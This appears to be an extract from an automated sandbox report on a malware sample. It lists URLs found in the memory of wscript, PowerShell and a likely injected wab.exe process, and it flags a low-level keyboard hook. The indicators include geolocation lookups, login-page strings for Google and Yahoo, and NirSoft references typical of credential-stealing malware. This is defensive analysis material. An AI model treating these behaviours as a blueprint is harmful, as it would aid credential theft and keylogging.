Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhv5123.tmp.13.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
Source: wscript.exe, 00000000.00000003.1712635301.0000027D86CF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/
Source: wscript.exe, 00000000.00000002.1720789824.0000027D84D3A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718407955.0000027D84D3A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1717846950.0000027D84D2F000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1713343554.0000027D84DDB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1713257774.0000027D84DDB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabS
Source: wscript.exe, 00000000.00000002.1720789824.0000027D84D3A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718407955.0000027D84D3A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1717846950.0000027D84D2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en7;
Source: wscript.exe, 00000000.00000003.1713343554.0000027D84DAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1713257774.0000027D84D87000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?797d5b5f55
Source: wab.exe, 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2373759125.000000000665F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2257022669.000000000665F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2993796074.000000000665F000.00000004.00000020.00020000.00000000.sdmp, bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://geoplugin.net/json.gp
Source: wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpC
Source: wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpW
Source: wab.exe, 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpk
Source: wab.exe, 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpt
Source: powershell.exe, 00000001.00000002.2377560186.0000026CE6643000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230426508.0000000005418000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230426508.00000000052DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://ocsp.digicert.com0
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://ocsp.digicert.com0:
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://ocsp.digicert.com0H
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://ocsp.digicert.com0I
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://ocsp.digicert.com0Q
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://ocsp.msocsp.com0
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://ocsp.msocsp.com0S
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://ocspx.digicert.com0E
Source: powershell.exe, 00000004.00000002.2227965271.00000000043CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2232934862.0000000006C9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2293994256.0000026CD65D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2227965271.0000000004271000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2227965271.00000000043CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2232934862.0000000006C9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: bhv5123.tmp.13.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://www.digicert.com/CPS0~
Source: wab.exe, wab.exe, 0000000C.00000002.2306940692.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2367729932.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
Source: wab.exe, wab.exe, 0000000C.00000002.2307273429.000000000338D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.2306940692.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2367729932.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2368598041.0000000002F3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.com
Source: wab.exe, 00000009.00000002.3005282213.00000000220F0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.2306940692.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2367729932.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: wab.exe, 00000009.00000002.3005282213.00000000220F0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.2306940692.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2367729932.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
Source: wab.exe, 0000000C.00000002.2307273429.000000000338D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.2368598041.0000000002F3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.comta
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696334965379
Source: wab.exe, 0000000A.00000002.2348371588.0000000002F03000.00000004.00000010.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2372810283.0000000002D83000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net
Source: wab.exe, 00000010.00000002.2367729932.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
Source: bhv5123.tmp.13.dr String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
Source: bhv5123.tmp.13.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhv5123.tmp.13.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: powershell.exe, 00000001.00000002.2293994256.0000026CD65D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.2227965271.0000000004271000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: bhv5123.tmp.13.dr String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
Source: powershell.exe, 00000004.00000002.2230426508.00000000052DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2230426508.00000000052DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2230426508.00000000052DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?99bdaa7641aea1439604d0afe8971477
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?bc7d158a1b0c0bcddb88a222b6122bda
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?4be9f57fdbd89d63c136fa90032d1d91
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?e5772e13592c9d33c9159aed24f891a7
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?a6aceac28fb5ae421a73cab7cdd76bd8
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?b57fe5cd49060a950d25a1d237496815
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?2f6c563d6db8702d4f61cfc28e14d6ba
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?3dacce210479f0b4d47ed33c21160712
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?7e0e9c3a9f02f17275e789accf11532b
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?81f59f7d566abbd2077a5b6cdfd04c7b
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?3c5bdbf226e2549812723f51b8fe2023
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?c50299ad5b45bb3d4c7a57024998a291
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
Source: powershell.exe, 00000004.00000002.2227965271.00000000043CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2232934862.0000000006C9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: bhv5123.tmp.13.dr String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhv5123.tmp.13.dr String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: wab.exe, 0000000A.00000003.2323238256.0000000004ECF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2329290801.0000000004ECE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2323238256.0000000004EC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2329963298.0000000004ECE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2347870319.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2330023743.0000000004ECE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2347553603.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2348008932.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2348845487.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2333304512.0000000004EC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2347754386.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2347652939.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2370974438.0000000004CCC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2371322290.0000000004CCC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2370073946.0000000004CC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2367929927.0000000004CC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2369245818.0000000004CCE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2369402203.0000000004CCE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2374590709.0000000004CCC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2369461857.0000000004CCE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2371465726.0000000004CCC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
Source: wab.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2.css
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qo
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2.js
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: powershell.exe, 00000001.00000002.2377560186.0000026CE6643000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230426508.0000000005418000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230426508.00000000052DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=27ff908e89d7b6264fde
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=586ba6
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=7ccb04
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=b1ed69
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: wab.exe, wab.exe, 0000000C.00000002.2306940692.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2367729932.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: wab.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr String found in binary or memory: https://www.office.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: C:\Program Files (x86)\Windows Mail\wab.exe Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe Jump to behavior
